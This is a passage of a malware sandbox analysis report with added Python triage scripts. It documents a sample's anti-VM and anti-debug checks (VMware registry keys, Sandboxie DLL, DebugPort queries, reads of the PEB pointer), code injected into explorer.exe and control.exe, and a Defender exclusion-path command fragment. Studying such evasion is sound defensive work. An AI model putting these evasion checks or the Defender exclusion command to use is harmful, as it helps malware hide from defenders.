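        return f"{s / 60:.1f} min"
    return f"{s / 3600:.1f} h"


def parse_sleep_lines(text: str):
    rows = []
    for m in SLEEP_LINE.finditer(text):
        ms, thr = int(m["ms"]), int(m["threshold"])
        rows.append({
            "proc": m["proc"].rsplit("\\", 1)[-1],   # basename of the image path
            "tid": int(m["tid"]),
            "ms": ms,
            "ticks": to_100ns_ticks(ms),
            "exceeds_threshold": ms >= thr,          # the report's own cut-off
            "effectively_infinite": ms >= INFINITE_MS,
            "human": describe(ms),
        })
    return rows


if __name__ == "__main__":
    for row in parse_sleep_lines(REPORT_LINES):
        print(f"{row['proc']:32} tid={row['tid']:<5} {row['human']}")
```

The explorer.exe and control.exe sleeps belong to the injected payload, not to the host programs: the control.exe function addresses listed earlier (027A62F9, 027B0109, 027BB3B5) mirror the sample's own functions (004062F9, 00410109, 0041B3B5) at a different base. A sandbox that fast-forwards such waits produces the "Thread delayed" entries above, and that skipping is itself what a sleep-then-compare-elapsed-time check looks for.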
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.683720257.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.678766847.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.689009704.000000000FD01000.00000004.00000001.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&v
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.675670351.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.683937578.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
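The string hits above mix two very different kinds of evidence. Those found in the sample's own memory (dump names starting 00000000, the submitted process) are the malware's checklist: the Sandboxie DLL name, the Wine-only export, the VMware Tools registry key and install path, the SCSI device-map and disk-enumeration keys, the display-adapter class key and the "VMware SVGA II" adapter name, plus a Defender `Add-MpPreference -ExclusionPath` fragment. Those found in explorer.exe (dump names starting 00000006) are the analysis VM's own device tree and Hyper-V resource strings, which any process on that machine would carry. The triage script below is an added example written for this write-up, not part of the JoeSandbox report; the category table is this example's own choice, and the input lines are copied from the report.

```python
"""Triage the report's 'Binary or memory string' hits by origin and category.

Added example for this write-up, not part of the JoeSandbox report.  The
category table is this example's own; the input lines are copied from the
report.  Only strings in the sample's own process memory show what the
malware checks; hits in explorer.exe are mostly the analysis VM's own strings.
"""
import re
from collections import Counter

SAMPLE_NAME = "350969bc_by_Libranalysis.exe"

CATEGORIES = [
    ("sandbox_dll", r"sbiedll\.dll"),                                  # Sandboxie hook DLL
    ("wine_export", r"wine_get_unix_file_name"),                       # Wine-only kernel32 export
    ("vmware_registry", r"SOFTWARE\\VMware, Inc\.|VMWARE TOOLS"),
    ("scsi_devicemap", r"HARDWARE\\DEVICEMAP\\Scsi|Services\\Disk\\Enum"),
    ("display_adapter", r"VMware SVGA|4D36E968-E325-11CE-BFC1-08002BE10318"),
    ("vm_device_id", r"Ven_NECVMWar|Ven_VMware|Prod_Virtual_disk"),
    ("hyperv_message", r"Hyper-V"),
    ("defender_exclusion", r"Add-MpPreference"),
    ("vm_vendor_name", r"^vmware$"),
]
CATEGORIES = [(name, re.compile(rx, re.I)) for name, rx in CATEGORIES]

# Tolerates the fused '...sdmpBinary or memory string:' form of the extraction.
ENTRY = re.compile(
    r"Source:\s*(?P<proc>[^,]+),\s*(?P<dump>\S+?\.sdmp)\s*"
    r"Binary or memory string:\s*(?P<text>.*)"
)

# Constructed input: seven lines copied from the report.
REPORT_LINES = r"""
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.683720257.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
"""


def classify(text: str):
    """Every category whose pattern matches; a fused string can hit several."""
    return [name for name, rx in CATEGORIES if rx.search(text)]


def triage(report_text: str, sample_name: str = SAMPLE_NAME):
    rows = []
    for line in report_text.splitlines():
        m = ENTRY.search(line)
        if not m:
            continue
        proc = m["proc"].strip()
        rows.append({
            "proc": proc,
            # First dotted field of the dump name is the analysis process index:
            # 00000000 is the submitted sample, 00000006 is explorer.exe here.
            "proc_index": int(m["dump"].split(".")[0], 16),
            "origin": "sample" if proc == sample_name else "system_process",
            "text": m["text"].strip(),
            "categories": classify(m["text"]),
        })
    return rows


def summarize(rows):
    """Categorised hits per origin; the 'sample' bucket is the malware's checklist."""
    return Counter(r["origin"] for r in rows if r["categories"])


if __name__ == "__main__":
    for r in triage(REPORT_LINES):
        print(f"{r['origin']:15} {','.join(r['categories']):38} {r['text'][:60]}")
    print(summarize(triage(REPORT_LINES)))
```

Two caveats when reading the output. Strings in explorer.exe and control.exe are not automatically noise, because the report shows both hosting injected payload code; a system-process hit only counts as the malware's when it sits in a region the payload wrote, which the dump name's protection field and the injection evidence elsewhere in the report can confirm. And the `Add-MpPreference -ExclusionPath` fragment only proves the string is present in the sample's memory; this section of the report records no execution of it.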
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004088B0 rdtsc 5_2_004088B0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00409B20 LdrLoadDll,5_2_00409B20
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01453D43 mov eax, dword ptr fs:[00000030h]5_2_01453D43
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143B944 mov eax, dword ptr fs:[00000030h]5_2_0143B944
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143B944 mov eax, dword ptr fs:[00000030h]5_2_0143B944
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01493540 mov eax, dword ptr fs:[00000030h]5_2_01493540
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01437D50 mov eax, dword ptr fs:[00000030h]5_2_01437D50
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C962 mov eax, dword ptr fs:[00000030h]5_2_0141C962
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B171 mov eax, dword ptr fs:[00000030h]5_2_0141B171
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B171 mov eax, dword ptr fs:[00000030h]5_2_0141B171
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C577 mov eax, dword ptr fs:[00000030h]5_2_0143C577
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C577 mov eax, dword ptr fs:[00000030h]5_2_0143C577
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]5_2_01419100
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]5_2_01419100
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]5_2_01419100
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov ecx, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141AD30 mov eax, dword ptr fs:[00000030h]5_2_0141AD30
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8D34 mov eax, dword ptr fs:[00000030h]5_2_014E8D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144513A mov eax, dword ptr fs:[00000030h]5_2_0144513A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144513A mov eax, dword ptr fs:[00000030h]5_2_0144513A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0149A537 mov eax, dword ptr fs:[00000030h]5_2_0149A537
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]5_2_01444D3B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]5_2_01444D3B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]5_2_01444D3B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov ecx, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]5_2_0141B1E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]5_2_0141B1E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]5_2_0141B1E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014A41E8 mov eax, dword ptr fs:[00000030h]5_2_014A41E8
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E0 mov eax, dword ptr fs:[00000030h]5_2_0142D5E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E0 mov eax, dword ptr fs:[00000030h]5_2_0142D5E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014C8DF1 mov eax, dword ptr fs:[00000030h]5_2_014C8DF1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A185 mov eax, dword ptr fs:[00000030h]5_2_0144A185
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C182 mov eax, dword ptr fs:[00000030h]5_2_0143C182
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442990 mov eax, dword ptr fs:[00000030h]5_2_01442990
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FD9B mov eax, dword ptr fs:[00000030h]5_2_0144FD9B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FD9B mov eax, dword ptr fs:[00000030h]5_2_0144FD9B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E05AC mov eax, dword ptr fs:[00000030h]5_2_014E05AC
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E05AC mov eax, dword ptr fs:[00000030h]5_2_014E05AC
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014461A0 mov eax, dword ptr fs:[00000030h]5_2_014461A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014461A0 mov eax, dword ptr fs:[00000030h]5_2_014461A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014435A1 mov eax, dword ptr fs:[00000030h]5_2_014435A1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014969A6 mov eax, dword ptr fs:[00000030h]5_2_014969A6
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]5_2_01441DB5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]5_2_01441DB5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01441DB5 mov eax, dword ptr fs:[00000030h]5_2_01441DB5
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014951BE mov eax, dword ptr fs:[00000030h]5_2_014951BE
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A44B mov eax, dword ptr fs:[00000030h]5_2_0144A44B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01430050 mov eax, dword ptr fs:[00000030h]5_2_01430050
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01430050 mov eax, dword ptr fs:[00000030h]5_2_01430050
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AC450 mov eax, dword ptr fs:[00000030h]5_2_014AC450
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014AC450 mov eax, dword ptr fs:[00000030h]5_2_014AC450
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143746D mov eax, dword ptr fs:[00000030h]5_2_0143746D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E1074 mov eax, dword ptr fs:[00000030h]5_2_014E1074
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D2073 mov eax, dword ptr fs:[00000030h]5_2_014D2073
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]5_2_014E740D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]5_2_014E740D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E740D mov eax, dword ptr fs:[00000030h]5_2_014E740D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496C0A mov eax, dword ptr fs:[00000030h]5_2_01496C0A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D1C06 mov eax, dword ptr fs:[00000030h]5_2_014D1C06
Reads of the PEB pointer (mov eax/ecx, dword ptr fs:[00000030h]; fs:[30h] is the PEB pointer in the 32-bit TEB), grouped by code function. "Reads" is the number of such instructions the sandbox reported in that function; the destination register is eax unless noted.

Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe (process 5)

  Code function     Reads
  5_2_014D1C06      3
  5_2_014E4015      2
  5_2_01497016      3
  5_2_0142B02A      4
  5_2_0144BC2C      1
  5_2_0144002D      5
  5_2_014E8CD6      1
  5_2_014AB8D0      6 (5 eax, 1 ecx)
  5_2_014158EC      1
  5_2_014D14FB      1
  5_2_01496CF0      3
  5_2_01419080      1
  5_2_01493884      2
  5_2_0142849B      1
  5_2_014420A0      6
  5_2_014590AF      1
  5_2_0144F0BF      3 (2 eax, 1 ecx)
  5_2_0141DB40      1
  5_2_0142EF40      1
  5_2_014E8B58      1
  5_2_0141F358      1
  5_2_0141DB60      1 (ecx)
  5_2_0142FF60      1
  5_2_014E8F6A      1
  5_2_01443B7A      2
  5_2_014E070D      2
  5_2_0144A70E      2
  5_2_0143F716      1
  5_2_014D131B      1
  5_2_014AFF10      2
  5_2_01414F2E      2
  5_2_0144E730      1
  5_2_014953CA      2
  5_2_014403E2      6
  5_2_0143DBE9      1
  5_2_014537F5      1
  5_2_014D138A      1
  5_2_014CD380      1 (ecx)
  5_2_01421B8F      2
  5_2_01442397      1
  5_2_0144B390      1
  5_2_01428794      1
  5_2_01497794      3
  5_2_01444BAD      3
  5_2_014E5BA5      1
  5_2_01419240      4
  5_2_01427E41      6
  5_2_014A4257      1
  5_2_014CB260      2
  5_2_014E8A62      1
  5_2_0142766D      1
  5_2_0143AE73      5
  5_2_0145927A      1
  5_2_0141C600      3
  5_2_01448E00      1
  5_2_014D1608      1
  5_2_01428A0A      1
  5_2_01415210      4 (3 eax, 1 ecx)
  5_2_0141AA16      2
  5_2_0144A61C      2
  5_2_01433A1C      1
  5_2_0141E620      1
  5_2_01454A2C      2
  5_2_014CFE3F      1
  5_2_01458EC7      1
  5_2_014436CC      1
  5_2_014CFEC0      1
  5_2_01442ACB      1
  5_2_014E8ED6      1
  5_2_014276E2      1
  5_2_01442AE4      1
  5_2_014416E0      1 (ecx)
  5_2_014AFE87      1
  5_2_0144D294      2
  5_2_014152A5      5
  5_2_014E0EA5      3
  5_2_014946A7      1
  5_2_0142AAB0      2
  5_2_0144FAB0      1

Source: C:\Windows\SysWOW64\control.exe (process 10, injected code)

  Code function     Reads
  10_2_047F2073     1
  10_2_0475746D     1
  10_2_04750050     2
  10_2_047CC450     2
  10_2_0476A44B     1
  10_2_04808CD6     1
  10_2_0476BC2C     1
  10_2_0476002D     5
  10_2_0474B02A     4
  10_2_047B7016     3
  10_2_047B6C0A     4
  10_2_047F1C06     14
  10_2_047F14FB     1
  10_2_047B6CF0     3
  10_2_0480740D     3
  10_2_04804015     2
  10_2_047358EC     1
  10_2_047CB8D0     6 (5 eax, 1 ecx)
  10_2_0476F0BF     3 (2 eax, 1 ecx)
  10_2_047620A0     6
  10_2_047790AF     1
  10_2_0474849B     1
  10_2_04739080     1
  10_2_04801074     1
  10_2_047B3884     2
  10_2_0473B171     2
  10_2_0475C577     2
  10_2_0473C962     1
  10_2_04757D50     1
  10_2_048005AC     2
  10_2_0475B944     2
  10_2_04773D43     1
  10_2_047B3540     1
  10_2_04743D34     13
  10_2_0473AD30     1
  10_2_047FE539     1
  10_2_0476513A     2
  10_2_047BA537     1
  10_2_04764D3B     3
  10_2_04754120     5 (4 eax, 1 ecx)
  10_2_04739100     3
  10_2_047E8DF1     1
  10_2_0473B1E1     3
  10_2_047C41E8     1
  10_2_0474D5E0     2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
